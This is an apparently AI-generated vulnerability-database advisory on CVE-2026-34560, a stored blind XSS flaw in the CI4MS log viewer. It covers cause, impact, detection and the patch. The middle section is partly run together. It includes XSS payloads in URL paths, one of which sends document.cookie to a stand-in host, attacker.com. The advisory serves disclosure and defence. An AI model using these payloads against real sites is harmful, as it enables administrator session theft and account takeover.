
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34560 is a Stored DOM Blind XSS vulnerability in CI4MS (a CodeIgniter 4-based CMS skeleton) that allows low-privileged attackers to inject malicious JavaScript payloads into application logs, which execute in the browser context of administrators when they view the logs interface. The vulnerability affects all CI4MS versions up to and including 0.28.6.0, and was disclosed on March 31, 2026, with a patch released in version 0.31.0.0. It carries a CVSS v3.1 base score of 9.1 (Critical) (GitHub Advisory, GitHub Security Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where user-controlled input flowing into application logs is stored and later rendered without HTML entity encoding or output sanitization in the administrative logs interface. The attack exploits unsafe DOM manipulation methods (e.g., .html(), innerHTML) or server-side templating that renders raw log data, allowing injected payloads to execute as JavaScript. An attacker with low-level authenticated access can trigger logging of a malicious payload by accessing endpoints such as /backend/backup/restore/<img src=x onerror=alert(document.domain)>, which causes an application error that writes the unsanitized payload into logs. The "blind" nature of the attack means the attacker does not observe immediate execution — the payload fires only when an administrator navigates to /backend/logs/ (GitHub Advisory, GitHub Security Advisory).
Successful exploitation enables persistent, arbitrary JavaScript execution in the browser context of any administrator who views the logs page, leading to full administrator account takeover via session token theft, privilege escalation for lower-privileged users, and complete application compromise. Attackers can modify application configuration, create rogue admin accounts, or pivot to further attacks against the underlying infrastructure. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the attacker's own session to affect the administrative security boundary (GitHub Advisory, GitHub Security Advisory).
A proof-of-concept exploit with concrete reproduction steps and a video PoC is publicly available in the GitHub Security Advisory, including specific vulnerable endpoints and XSS payloads (GitHub Security Advisory). There is no current evidence of in-the-wild exploitation or threat actor attribution. The EPSS score is approximately 0.025% (8th percentile), indicating a low but non-negligible probability of exploitation in the near term. The vulnerability is not listed in the CISA KEV catalog at this time (GitHub Advisory).
PR:L — low privileges)./backend/backup/restore/<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>. The application logs the error including the unsanitized path segment./backend/logs/./backend/logs/ page; unusual DNS lookups or beacon requests triggered during log viewing sessions.onerror=, onload=, <script>), or encoded XSS payloads within URL path segments, particularly in entries related to /backend/backup/restore/ or similar endpoints.writable/logs/*.log) containing raw, unsanitized HTML or JavaScript strings injected via URL parameters or path segments.Upgrade CI4MS to version 0.31.0.0 or later, which replaces the vulnerable log viewer with a secure internal LogViewer library and implements global input validation and enhanced XSS/CSRF protections (CI4MS Release). For organizations unable to patch immediately, restrict access to the /backend/logs/ interface to trusted administrators only via network-level controls, and deploy a Web Application Firewall (WAF) to filter XSS payloads in HTTP requests. Additionally, enforce HttpOnly and SameSite cookie attributes on session cookies to limit the impact of any successful XSS execution, and implement a strict Content Security Policy (CSP) header (GitHub Advisory).
The vulnerability was covered by The Hacker Wire, which published an article specifically on the CI4MS Blind XSS in the logs interface (The Hacker Wire). Social media mentions were observed on Mastodon and Bluesky shortly after disclosure, indicating moderate community awareness. No major vendor statements beyond the project maintainer's own advisory and patch release have been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."